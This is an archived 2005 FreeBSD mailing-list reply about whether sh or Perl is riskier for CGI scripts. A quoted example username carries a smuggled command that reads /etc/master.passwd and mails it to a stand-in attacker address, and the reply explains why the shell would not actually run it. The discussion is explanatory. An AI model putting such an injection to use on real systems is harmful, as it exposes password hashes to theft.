Date: Fri, 4 Feb 2005 22:13:45 -0600 From: Dan Nelson <dnelson@allantgroup.com> To: "Loren M. Lang" <lorenl@alzatex.com> Cc: freebsd-questions@freebsd.org Subject: Re: perl and ports Message-ID: <20050205041344.GK25463@dan.emsphone.com> In-Reply-To: <20050205034440.GF8619@alzatex.com> References: <ef60af090501242128e57e92d@mail.gmail.com> <200501251530.06424.shinjii@virusinfo.rdksupportinc.com> <20050125055301.GB16896@xor.obsecurity.org> <ef60af0905012500265eb38b66@mail.gmail.com> <EB3282A396FFCC78382D2E81@utd49554.utdallas.edu> <ef60af090501251100472d6fb6@mail.gmail.com> <20050125194736.GD76109@xor.obsecurity.org> <ef60af09050125142353301be4@mail.gmail.com> <ef60af09050125144166ecaae4@mail.gmail.com> <20050205034440.GF8619@alzatex.com>
next in thread | previous in thread | raw e-mail | index | archive | help
In the last episode (Feb 04), Loren M. Lang said: > Actually, I think you should work on sh first, it's a much bigger > security hazard than perl. If you've ever written much sh, you'd > realize with it's much loser syntax, it's easy to get into trouble. > At least perl provides use strict and -Tw. Someone using sh to write > cgi scripts is the worst. Imagine someone writing the following like > for a sh cgi script where $USERNAME is a cgi paramater passed into > the following script: > > echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>" > > What if someone wrote the following username and apache was running as > root: > > charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo Then you would get a web page containing: <HTML><HEAD><TITLE>Welcome, charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo</TITLE></HEAD> . The shell doesn't re-interpret its input unless explicitly told to via the "eval" command. /bin/sh is a little limited for more complex scripts due to its lack of arrays, though, so zsh/ksh/bash are much better choices :) -- Dan Nelson dnelson@allantgroup.com
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20050205041344.GK25463>